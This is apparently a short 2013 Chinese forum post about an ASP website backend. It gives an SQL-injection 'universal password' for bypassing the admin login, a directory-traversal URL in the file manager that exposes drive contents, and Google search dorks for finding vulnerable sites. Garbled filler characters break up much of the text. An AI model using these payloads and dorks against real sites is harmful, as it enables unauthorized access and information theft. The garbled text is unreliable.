后台万能密码 'or'='or'9 n! s( D4 }5 I% {, n/ {* [
7 k# s4 a) s( u( I1 @8 }/ N! ]后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! L2 N4 c% L( S3 N0 e) ?+ E3 M6 {# J8 X
admin/uploadfile.asp?currentFolder=/upfiles/../4 E9 R6 A, v6 }) v
! \& Q% r, v _" a
漏洞证明:
. d9 H" Z) ~; `; C+ O( e8 L5 E" L! o7 n
谷歌:inurl:type.asp?id=1 新闻中心: \7 }1 y# t( a
或者 :inurl:download_ok.asp?; G/ f) ~: ^! q( D/ C# n7 t
; Z& u' w8 Z3 @8 h
|
发表于 2013-3-14 20:17:32
收藏
支持
反对